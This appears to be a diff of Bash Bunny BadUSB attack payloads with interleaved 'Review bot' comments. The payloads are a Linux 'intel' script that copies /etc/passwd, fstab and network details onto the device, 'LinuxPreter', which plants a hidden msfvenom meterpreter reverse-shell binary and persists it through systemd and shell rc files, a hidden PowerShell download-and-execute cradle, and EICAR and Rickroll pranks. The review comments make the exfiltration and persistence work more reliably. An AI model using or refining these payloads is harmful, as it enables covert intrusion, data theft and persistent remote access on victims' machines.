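Review bot: `cp -r '~/.ssh' '$mntt/loot/SSH'` does not behave the same on a second run: once `loot/SSH` exists, cp copies into `loot/SSH/.ssh`, so the next target's keys end up nested under the first target's and a third run overwrites them. Keying the destination by host and time keeps every run separate: `Q STRING cp -r '~/.ssh' '$mntt/loot/SSH-$(hostname)-$(date +%s)'` (the single quotes are stripped on the Bunny, so `$(hostname)` expands on the target exactly as `$mntt` already does). The fixed `Q DELAY 2000` after the copy is a guess; appending `\&\& udisksctl unmount -b /dev/'$disk'` to the cp line, the way the macOS Rickroll payload escapes `&&`, waits exactly as long as the copy takes.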


@ -0,0 +1,24 @@
# intel(intelligence)
## About:
* Title: intel
* Description: intel(intelligence) payload collects detailed information of victims machine.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Exfiltration
* Target: GNU/Linux
* Attackmodes: HID, Storage
## intel(intelligence) payload collects detailed information of victims machine.
### Workflow:
1. Prevent storing history.
2. Fetching BashBunny's block device.
3. Mounting BashBunny.
4. Transfering payload script and executing it.
5. Deleting script from victims system.
6. Unmounting BashBunny.
#### Support me if you like my work:
* https://twitter.com/drapl0n


@ -0,0 +1,67 @@
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
echo -e "*******************************************" >> $mntt/loot/intel
echo "Network Schema:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
nmap -sV localhost >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "Network Interfaces:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
ifconfig >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
ip addr >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
iwconfig >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo Storage Info: >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
findmnt >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
cat /etc/fstab >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "USB Info:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
lsusb -v >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "PCI Info:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
lspci -vvv >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "CPU Info:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
lscpu >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "Systemd services:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
systemctl list-units >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo User/groups: >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
id >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
cat /etc/passwd >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "Installed packages:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
pacman -Q >> $mntt/loot/intel || apt list --installed >> $mntt/loot/intel || dpkg -l >> $mntt/loot/intel || apk info >> $mntt/loot/intel || yum list installed >> $mntt/loot/intel || dnf list installed >> $mntt/loot/intel || zypper se --installed-only >> $mntt/loot/intel || rpm -qa >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
snap list >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
flatpak list --app >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "******************************************" >> $mntt/loot/intel
echo "Directory Structure:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
find * / >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "******************************************" >> $mntt/loot/intel
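Review bot: Every line appends to the single `$mntt/loot/intel` file, so a second host's output is simply interleaved after the first's with nothing naming the host, and if `$mntt` is empty because the device lookup failed, the redirections fall through to `/loot/intel` on the target. `find * /` at the end walks the entire filesystem including /proc and /sys plus whatever directory the terminal opened in; on an ordinary disk that can run for minutes and dominate the loot file, while the calling payload.txt only waits 25 s before typing the unmount. Opening one per-host log with `exec` removes the repeated redirections, and bounding the walk keeps the run predictable:
```shell
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
# one file per host and run; everything below writes to it
loot="$mntt/loot/intel-$(hostname)-$(date +%s)"
mkdir -p "$mntt/loot"
exec >>"$loot" 2>&1
echo "*******************************************"
echo "Network Schema:"
# … unchanged: remaining sections, each line minus its `>> $mntt/loot/intel` suffix …
# -xdev stays on the root filesystem (skips /proc, /sys, mounts); depth keeps the listing bounded
find / -xdev -maxdepth 4
```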


@ -0,0 +1,56 @@
# Title: intel
# Description: intel(intelligence) payload collects detailed information of victims machine.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Exfiltration
# Target: GNU/Linux operating systems.
# Attackmodes: HID, Storage.
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/intel.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/intel.sh
Q ENTER
Q STRING /tmp/./intel.sh
Q ENTER
Q DELAY 25000
Q STRING rm /tmp/intel.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH
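Review bot: `Q DELAY 25000` after `/tmp/./intel.sh` is a guess: the `rm`, `udisksctl unmount` and `exit` typed afterwards are queued by the terminal and should only be read by the shell once intel.sh returns, so the delay decides nothing except when LED FINISH lights — and FINISH lighting while `find /` is still writing to the udisk invites an unplug that truncates the loot. Chain the steps and drop the delay instead: `Q STRING /tmp/intel.sh \&\& rm /tmp/intel.sh`, escaping `&&` the way the macOS Rickroll payload does so it is typed on the target rather than parsed on the Bunny. The `lsblk | grep 1.8G` device discovery is shared verbatim with the other three Linux payloads in this commit and has the same size-collision weakness.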


@ -0,0 +1,2 @@
#!/bin/bash
echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'\ >Desktop/Malware.txt
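Review bot: `>Desktop/Malware.txt` is relative to the current directory, so the script only works because the calling payload.txt types `cd` first; the `\ ` after the closing quote also appends a trailing space to the EICAR string, which the EICAR specification tolerates but which reads like a typo. Writing with an absolute path and `printf` removes both quirks and avoids `echo`'s backslash handling on shells with xpg_echo enabled: `printf '%s\n' 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' > "$HOME/Desktop/Malware.txt"`.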


@ -0,0 +1,32 @@
#!/bin/bash
# Title: MacOS_EICAR
# Description: Bad USB PoC for MacOS.
# Author: Ciph3rtxt
# Category: PoC
# Target: MacOS
# Attackmodes: HID STORAGE
# Setup
LED R
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
path=/Volumes/BashBunny/payloads/$SWITCH_POSITION
# Execute Attack
LED R
DELAY 200
RUN OSX terminal
Q DELAY 2000
Q STRING cd
Q ENTER
Q DELAY 200
Q STRING chmod a+x $path/eicar.sh
Q ENTER
Q DELAY 200
Q STRING $path/eicar.sh
Q ENTER
Q DELAY 200
# Complete
LED G
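Review bot: The `chmod a+x $path/eicar.sh` step modifies a file on the Bunny's own udisk from the target and is unnecessary; `Q STRING bash $path/eicar.sh` runs the script without touching the volume and drops one of the three typed commands. `DELAY 200` after `ATTACKMODE HID STORAGE` may be shorter than macOS needs to mount the volume, so a guard typed before the script, `Q STRING while [ ! -f $path/eicar.sh ]\; do sleep 1\; done`, waits for the mount instead of assuming it. The README lists Red as Attack, yet the setup phase also uses `LED R`, so the two phases cannot be told apart on the device.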


@ -0,0 +1,19 @@
# MacOS EICAR PoC
Author: Ciph3rtxt
## Category:
PoC
## Description:
Generates EICAR file to simulate USB (physical access) malware attack.
## Status:
|LED|STATUS|
|-|-|
|Red|Attack|
|Green|Complete|


@ -13,7 +13,7 @@ Q DELAY 1000
Q GUI n Q GUI n
Q DELAY 1000 Q DELAY 1000
Q STRING hi=0\; ho=\$\(date \'+%H%M\'\)\; while test \$hi == \'0\'\; do if [ \$ho == $time ]\; then osascript -e \"set Volume 9\" \&\& open \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; hi=1\; fi\; ho=\$\(date \'+%H%M\'\)\; sleep 1\; done \& disown Q STRING hi=0\; ho=\$\(date \'+%H%M\'\)\; while [ \$hi = \'0\' ]\; do if [ \$ho = $time ]\; then osascript -e \"set Volume 9\" \&\& open \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; hi=1\; fi\; ho=\$\(date \'+%H%M\'\)\; sleep 1\; done \& disown
# close up shop # close up shop
Q DELAY 1000 Q DELAY 1000


@ -0,0 +1,37 @@
#!/bin/bash
# Title: Hi There
# Description: Creates a hidden link file that override the ctrl+c functionality.
# So, when the user press ctrl+c it lunches the first sign-in animation.
# Author: Cribbit
# Version: 1.0
# Category: Pranks
# Target: Windows (Powershell 5.1+)
# Attackmodes: RNDIS_ETHERNET HID
# Props: v3ded, Hexacorn and Audibleblink (Python Server)
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED ATTACK
QUACK DELAY 200
RUN WIN "powershell -Noni -NoP -W h -EP Bypass -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
QUACK DELAY 500
QUACK CTRL c
LED FINISH
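Review bot: The `iptables -A OUTPUT -p udp --dport 53 -j DROP` rule and the `SimpleHTTPServer` are never undone, so each run appends another DROP rule to the Bunny's OUTPUT chain and leaves a web server exposing the payload directory after LED FINISH. Capture the server PID and clean up at the end: `python -m SimpleHTTPServer 80 & srv=$!`, then after the `QUACK CTRL c` line `kill "$srv"` and `iptables -D OUTPUT -p udp --dport 53 -j DROP`. The 500 ms between launching PowerShell and sending Ctrl+C looks short for PowerShell to start, download `s` and save the .lnk; if the prank is meant to fire on that first keypress, a longer delay would be safer.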


@ -0,0 +1,33 @@
# Hi There
- Author: Cribbit
- Version: 1.0
- Tested on: Windows 10 (Powershell 5.1+)
- Category: Pranks
- Attackmode: HID & RNDIS_ETHERNET
- Extensions: Run
- Props: v3ded, Hexacorn and Audibleblink (Python Server)
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Creates a hidden link file that override the ctrl+c functionality.
So, when the user press ctrl+c it lunches the first sign-in animation.
## Notes
to kill the animation, you need to open task manger and look for "First Sign-in Animation".
For extra evilness add `/explorer` to the `$shortcut.Arguments` line in the script file. Then you can't switch programs or kill it.
## More information
<https://v3ded.github.io/redteam/abusing-lnk-features-for-initial-access-and-persistence>
<https://www.hexacorn.com/blog/2022/01/16/windows-installation-animation/>
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISHED | Green blink followed by SOLID | Injection finished |


@ -0,0 +1,19 @@
$path = "$([Environment]::GetFolderPath('Desktop'))\readme.lnk"
$wshell = New-Object -ComObject Wscript.Shell
$shortcut = $wshell.CreateShortcut($path)
$shortcut.IconLocation = "C:\Windows\System32\shell32.dll,70"
$shortcut.TargetPath = "C:\Windows\System32\oobe\FirstLogonAnim.exe"
$shortcut.Arguments = "/RunFirstLogonAnim"
$shortcut.WorkingDirectory = "C:"
$shortcut.HotKey = "CTRL+C"
$shortcut.Description = "Contain very important information"
$shortcut.WindowStyle = 7
# 7 = Minimized window
# 3 = Maximized window
# 1 = Normal window
$shortcut.Save()
(Get-Item $path).Attributes += 'Hidden' # Optional if we want to make the link invisible (prevent user clicks)
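Review bot: `$shortcut.WorkingDirectory = "C:"` is a drive-relative path, which resolves to whatever the current directory on C: happens to be rather than the root; `"C:\"` is the intended value. The Hidden attribute on the last line stops accidental clicks but also hides the file from a plain directory listing, so the README's clean-up advice (task manager) should add that the shortcut itself must be removed with `Remove-Item -Force "$env:USERPROFILE\Desktop\readme.lnk"` or the Ctrl+C override stays in place.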


@ -0,0 +1,36 @@
## About:
* Title: LinuxPreter
* Description: Injects meterpreter payload and makes it persistent.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Remote Access
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## LinuxPreter injects meterpreter payload, make it persistent and triggers payload on launch of terminal/shell.
### Workflow:
* Keeping tracks clear by preventing storage of history.
* Fetching BashBunny's block device and mounting it.
* Transfering payload script and payload itself.
* Deleting scripts from victims machine and unmounting bunny.
### Create Meterpreter payload:
* ```msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP ADDRESS> LPORT=<PORT NO> -f elf -o sysHandle.bin```
* NOTE: Only change IP address and Port number in the above command.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| payload.txt | /payload/switch1/ |
| payload.sh | /payload/ |
| sysHandle.bin | /tools/ |
#### Support me if you like my work:
* https://twitter.com/drapl0n


@ -0,0 +1,12 @@
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
mkdir /var/tmp/.system
cp -r $mntt/tools/sysHandle.bin /var/tmp/.system
chmod +x /var/tmp/.system/sysHandle.bin
mkdir -p ~/.config/systemd/user/
systemctl --user start systemPer.service
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/./sysHandle.bin -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemPer.service
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service \" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service\" >> ~/.bashrc\nfi" > ~/tmmmp
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
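Review bot: `systemctl --user start systemPer.service` runs before the unit file is written on the following line and there is no `daemon-reload` or `enable` anywhere, so the service never starts at injection time and the only persistence is the line appended to .bashrc/.zshrc. `WantedBy=multi-user.target` is not a target of the per-user manager (user units want `default.target`), and `-no-browser` is passed to the meterpreter binary for no visible reason. Writing the unit with a quoted heredoc and ordering the systemctl calls after it fixes both:
```shell
# … unchanged: device lookup and staging of sysHandle.bin …
mkdir -p ~/.config/systemd/user/
cat > ~/.config/systemd/user/systemPer.service <<'EOF'
[Unit]
Description=System BUS handler

[Service]
ExecStart=/var/tmp/.system/sysHandle.bin
Restart=on-failure
SuccessExitStatus=3 4
RestartForceExitStatus=3 4

[Install]
WantedBy=default.target
EOF
systemctl --user daemon-reload
systemctl --user enable --now systemPer.service
# … unchanged: rc-file persistence …
```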


@ -0,0 +1,56 @@
# Title: LinuxPreter
# Description: Injects meterpreter payload and makes it persistent.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Remote Access
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 1000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH
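Review bot: `Q DELAY 1000` between `/tmp/./payload.sh` and `rm /tmp/payload.sh` buys nothing: the shell runs the script to completion before it reads the next typed line, so `Q STRING /tmp/payload.sh \&\& rm /tmp/payload.sh` (escaping `&&` as the macOS Rickroll payload does) is both shorter and exact. The Target line says `Unix-like operating systems with systemd`, but the typed commands depend on `udisksctl` and a GNOME-style `CTRL-ALT t` terminal shortcut, and the README's `linux/x86` meterpreter runs on x86_64 hosts only where 32-bit compatibility is enabled and not at all on arm64, so the stated scope is wider than what the payload supports.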